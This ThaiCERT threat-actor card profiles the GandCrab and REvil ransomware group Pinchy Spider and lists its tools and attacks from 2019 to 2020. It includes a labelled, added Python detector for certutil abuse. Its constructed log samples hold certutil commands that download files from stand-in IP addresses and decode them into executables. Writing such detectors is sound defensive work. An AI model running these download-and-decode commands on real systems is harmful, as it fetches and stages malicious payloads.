ETDA ThaiCERT

Threat Group Cards: A Threat Actor Encyclopedia

Other threat group: Pinchy Spider, Gold Southfield

Names: Pinchy Spider (CrowdStrike)
Gold Southfield (SecureWorks)
Gold Garden (SecureWorks)
Country: Russia
Motivation: Financial gain
First seen: 2018
Description: (CrowdStrike) CrowdStrike Intelligence has recently observed Pinchy Spider affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes Pinchy Spider and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.”

Pinchy Spider is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. Pinchy Spider sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but Pinchy Spider is also willing to negotiate up to a 70-30 split for “sophisticated” customers.

GandCrab and Sodinokibi have been observed to be distributed by DanaBot (operated by Scully Spider, TA547) and Taurus Loader (operated by Venom Spider, Golden Chickens).
Observed:
Countries: Worldwide.
Tools used: certutil, Cobalt Strike, GandCrab, Sodinokibi.
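The card lists certutil among the affiliates' tooling, and the description above notes that deployments rely on tooling normally seen from penetration testers. The following is an added example, not code from this page or from any of the vendors it cites: detection logic that runs over process-creation log lines and flags the generic living-off-the-land abuse of certutil (fetching a remote file with -urlcache or -verifyctl plus -f and a URL, then -decode to turn the blob into a binary). Those flag combinations are the well-known certutil abuse pattern and are not claimed by this card to be what these affiliates ran; the key=value log format, hostnames, usernames and IP addresses are all constructed for the example.

```python
"""Flag certutil.exe used as a downloader or decoder in process-creation logs.

Added example: the flag combinations checked here (-urlcache/-verifyctl with -f
and a URL, -decode, -encode) are the generic living-off-the-land abuse of
certutil, not behaviour documented on this page. The log format and every
sample line below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# key=value pairs, values optionally double-quoted (constructed log format)
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed process-creation summaries in the style of Windows event 4688 /
# Sysmon event 1; none of these lines is taken from a real incident.
SAMPLE_EVENTS = [
    r'time=2019-02-12T03:14:07Z host=WS01 user=CORP\jdoe parent=cmd.exe cmdline="certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\Users\Public\x.txt"',
    r'time=2019-02-12T03:14:09Z host=WS01 user=CORP\jdoe parent=cmd.exe cmdline="certutil -decode C:\Users\Public\x.txt C:\Users\Public\x.exe"',
    r'time=2019-02-12T08:01:22Z host=ADMIN02 user=CORP\helpdesk parent=powershell.exe cmdline="certutil.exe -urlcache"',
    r'time=2019-02-12T08:05:40Z host=ADMIN02 user=CORP\helpdesk parent=explorer.exe cmdline="certutil.exe -hashfile C:\Temp\setup.msi SHA256"',
    r'time=2019-02-12T09:30:00Z host=SRV03 user=CORP\svc_backup parent=services.exe cmdline="cmd.exe /c whoami"',
    r'time=2019-02-13T01:02:03Z host=SRV03 user=CORP\svc_backup parent=wscript.exe cmdline="C:\Windows\System32\certutil.exe -verifyctl -f -split https://203.0.113.9/p.bin"',
]


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value line; quoted values keep their spaces, quotes dropped."""
    fields = {}
    for key, raw in _KV.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append(''.join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append(''.join(cur))
    return tokens


def classify_certutil(cmdline: str) -> Optional[str]:
    """Return a rule name if the command line is a suspicious certutil use, else None.

    Only the executed image (first token) is inspected: a certutil launched via
    'cmd.exe /c certutil ...' shows up in the child process's own event.
    """
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = tokens[0].replace('/', '\\').rsplit('\\', 1)[-1].lower()
    if image not in ('certutil.exe', 'certutil'):
        return None
    args = tokens[1:]
    flags = {t.lstrip('-/').lower() for t in args if t[0] in '-/'}
    has_url = any(_URL.match(t) for t in args)
    # Fetching a remote file: the classic LOLBin download (-urlcache or -verifyctl with -f).
    if 'f' in flags and has_url and flags & {'urlcache', 'verifyctl'}:
        return 'certutil_download'
    # Turning a base64/hex blob back into a binary: the usual second step after the download.
    if flags & {'decode', 'decodehex'}:
        return 'certutil_decode'
    # Encoding a file to text: occasionally used to stage data before exfiltration.
    if 'encode' in flags:
        return 'certutil_encode'
    return None


def detect(lines: Iterable[str]) -> List[Finding]:
    """Run the certutil rules over log lines and collect findings in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        cmd = ev.get('cmdline', '')
        rule = classify_certutil(cmd)
        if rule:
            findings.append(Finding(ev.get('host', '?'), ev.get('user', '?'), rule, cmd))
    return findings


if __name__ == '__main__':
    for f in detect(SAMPLE_EVENTS):
        print(f'{f.host:8} {f.user:16} {f.rule:18} {f.cmdline}')
```

On the constructed sample the two WS01 lines and the SRV03 wscript.exe line are flagged; the bare `certutil.exe -urlcache` (which only lists the URL cache) and the `-hashfile` call are legitimate administrative use and pass, which is why the download rule requires both the fetch flag and a remote URL rather than the flag alone. In a real environment the same rule should be joined with the parent process and the user context (a certutil download spawned by an Office or script host, or run by a service account, is the case worth paging on).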
Operations performed:
Apr 2019: Sodinokibi ransomware exploits WebLogic Server vulnerability
<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>
Jun 2019: Yesterday night, a source in the malware community told ZDNet that the GandCrab RaaS operator formally announced plans to shut down their service within a month.
The announcement was made in an official thread on a well-known hacking forum, where the GandCrab RaaS has advertised its service since January 2018, when it formally launched.
<https://www.zdnet.com/article/gandcrab-ransomware-operation-says-its-shutting-down/>
Aug 2019: Over 20 Texas local governments hit in 'coordinated ransomware attack'
<https://www.zdnet.com/article/at-least-20-texas-local-governments-hit-in-coordinated-ransomware-attack/>
Dec 2019: CyrusOne, one of the biggest data center providers in the US, has suffered a ransomware attack, ZDNet has learned.
<https://www.zdnet.com/article/ransomware-attack-hits-major-us-data-center-provider/>
Dec 2019: Sodinokibi Ransomware Behind Travelex Fiasco: Report
<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>
Dec 2019: A crypto virus that attacked the Albany County Airport Authority's computer management provider during the Christmas holiday period ended up infecting the authority's servers as well, encrypting files and demanding a ransom payment.
<https://www.timesunion.com/business/article/Ransomware-attack-cripples-airport-authority-s-14963401.php>
Jan 2020: New Jersey Synagogue Suffers Sodinokibi Ransomware Attack
<https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/>
Jan 2020: Sodinokibi Ransomware Publishes Stolen Data for the First Time
They claim this data belongs to Artech Information Systems, who describe themselves as a 'minority- and women-owned diversity supplier and one of the largest IT staffing companies in the U.S', and that they will release more if a ransom is not paid.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/>
Feb 2020: The operators of the Sodinokibi Ransomware (REvil) have started urging affiliates to copy their victim's data before encrypting computers so it can be used as leverage on a new data leak site that is being launched soon.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/>
Feb 2020: The operators behind Sodinokibi Ransomware published download links to files containing what they claim is financial and work documents, as well as customers' personal data stolen from giant U.S. fashion house Kenneth Cole Productions.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-posts-alleged-data-of-kenneth-cole-fashion-giant/>
Mar 2020: The operators of the Sodinokibi Ransomware are threatening to publicly share a company's 'dirty' financial secrets because they refused to pay the demanded ransom.
As organizations decide to restore their data manually or via backups instead of paying ransoms, ransomware operators are escalating their attacks.
<https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/>
Mar 2020: Recently, the Sodinokibi Ransomware operators published over 12 GB of stolen data allegedly belonging to a company named Brooks International for not paying the ransom.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-data-leaks-now-sold-on-hacker-forums/>
Apr 2020: Sodinokibi Ransomware to stop taking Bitcoin to hide money trail
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/>
Apr 2020: SeaChange video platform allegedly hit by Sodinokibi ransomware
<https://www.bleepingcomputer.com/news/security/seachange-video-platform-allegedly-hit-by-sodinokibi-ransomware/>
May 2020: REvil ransomware threatens to leak A-list celebrities' legal docs
<https://www.bleepingcomputer.com/news/security/revil-ransomware-threatens-to-leak-a-list-celebrities-legal-docs/>
May 2020: REvil ransomware gang publishes 'Elexon staff's passports' after UK electrical middleman shrugs off attack
<https://www.theregister.com/2020/06/01/elexon_ransomware_was_revil_sodinokibi/>
May 2020: Here come REvil ransomware operators with another massive data leak. In this instance, they leaked the confidential data of Agromart Group, well-known crop production partners.
<https://cybleinc.com/2020/06/02/times-up-for-agromart-group-and-their-data-got-leaked-by-revil-ransomware-operators/>
Jun 2020: REvil ransomware creates eBay-like auction site for stolen data
<https://www.bleepingcomputer.com/news/security/revil-ransomware-creates-ebay-like-auction-site-for-stolen-data/>
Jun 2020: REvil ransomware operators have been observed while scanning one of their victim's network for Point of Sale (PoS) servers by researchers with Symantec's Threat Intelligence team.
<https://www.bleepingcomputer.com/news/security/revil-ransomware-scans-victims-network-for-point-of-sale-systems/>
Jun 2020: The threat actor behind the Sodinokibi (REvil) ransomware is demanding a $14 million ransom from Brazilian-based electrical energy company Light S.A.
<https://www.securityweek.com/ransomware-operators-demand-14-million-power-company>
Jul 2020: A ransomware gang has infected the internal network of Telecom Argentina, one of the country's largest internet service providers, and is now asking for a $7.5 million ransom demand to unlock encrypted files.
<https://www.zdnet.com/article/ransomware-gang-demands-7-5-million-from-argentinian-isp/>
Jul 2020: Administrador de Infraestructuras Ferroviarias (ADIF), a Spanish state-owned railway infrastructure manager, was hit by REvil ransomware operators.
<https://securityaffairs.co/wordpress/106304/cyber-crime/adif-revil-ransomware-attack.html>
Aug 2020: Brown-Forman, one of the largest U.S. companies in the spirits and wine business, suffered a cyber attack. The intruders allegedly copied 1TB of confidential data.
<https://www.bleepingcomputer.com/news/security/us-spirits-and-wine-giant-hit-by-cyberattack-1tb-of-data-stolen/>
Sep 2020: REvil ransomware deposits $1 million in hacker recruitment drive
<https://www.bleepingcomputer.com/news/security/revil-ransomware-deposits-1-million-in-hacker-recruitment-drive/>
Counter operations:
Jul 2020: GandCrab ransomware operator arrested in Belarus
<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/>
Information:
<https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/>
<https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/>
<https://www.secureworks.com/blog/revil-the-gandcrab-connection>
<https://blog.morphisec.com/threat-profile-gandcrab-ransomware>
<https://www.kpn.com/security-blogs/Tracking-REvil.htm>
<https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack>

Last change to this card: 19 October 2020


Thailand Computer Emergency Response Team (ThaiCERT)
Electronic Transactions Development Agency
